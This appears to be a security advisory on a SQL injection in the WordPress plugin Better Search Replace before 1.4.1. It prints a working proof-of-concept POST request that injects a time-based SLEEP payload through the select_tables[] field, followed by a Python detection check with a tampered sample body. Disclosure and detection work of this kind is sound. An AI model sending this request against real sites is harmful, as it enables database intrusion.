The plugin does not properly sanitise and escape table data before inserting it into a SQL query, which could allow high-privilege users to perform SQL Injection attacks.
```
POST /wp-admin/tools.php?page=better-search-replace&bsr-ajax=process_search_replace HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 369
Connection: close
Cookie: [admin+]

bsr_ajax_nonce=3c38e50368&action=process_search_replace&bsr_step=0&bsr_page=0&bsr_data=search_for%3Daaa%26replace_with%3Dcef%26select_tables%255B%255D%3Dwp_posts%60%20WHERE%201=SLEEP(1)%20--%20%26dry_run%3Don%26bsr_nonce%3Da66e81c52b%26_wp_http_referer%3D%252Fwordpress%252Fwp-admin%252Ftools.php%253Fpage%253Dbetter-search-replace%26action%3Dbsr_process_search_replace
```
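A detection check for requests of the shape shown above, as an added example that is not part of the original advisory or the plugin's code: it decodes the nested `bsr_data` form field and flags `select_tables[]` values that are not plain identifiers. The function name, the allowed-character pattern and both sample bodies are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Assumption: legitimate table names contain only these characters.
SAFE_TABLE = re.compile(r"[A-Za-z0-9_$]+")


def suspicious_tables(form_body):
    """Return select_tables[] values that are not plain SQL identifiers."""
    outer = parse_qs(form_body, keep_blank_values=True)
    flagged = []
    for packed in outer.get("bsr_data", []):
        # bsr_data is itself a URL-encoded form, so it must be decoded again
        # before the table names become visible.
        inner = parse_qs(packed, keep_blank_values=True)
        for name in inner.get("select_tables[]", []):
            if not SAFE_TABLE.fullmatch(name):
                flagged.append(name)
    return flagged


# Constructed sample bodies modelled on the request in this advisory.
BENIGN_BODY = (
    "bsr_ajax_nonce=0000000000&action=process_search_replace"
    "&bsr_step=0&bsr_page=0"
    "&bsr_data=search_for%3Daaa%26replace_with%3Dcef"
    "%26select_tables%255B%255D%3Dwp_posts"
    "%26select_tables%255B%255D%3Dwp_options%26dry_run%3Don"
)
TAMPERED_BODY = (
    "bsr_ajax_nonce=0000000000&action=process_search_replace"
    "&bsr_step=0&bsr_page=0"
    "&bsr_data=search_for%3Daaa%26replace_with%3Dcef"
    "%26select_tables%255B%255D%3Dwp_posts%60%20WHERE%201=SLEEP(1)%20--%20"
    "%26dry_run%3Don"
)

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("tampered", TAMPERED_BODY)):
        print(label, suspicious_tables(body))
```

The same identifier check can be applied to request bodies captured by a WAF or reverse proxy in front of `/wp-admin/tools.php`.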
CPE

Name | Operator | Version |
---|---|---|
better-search-replace | lt | 1.4.1 |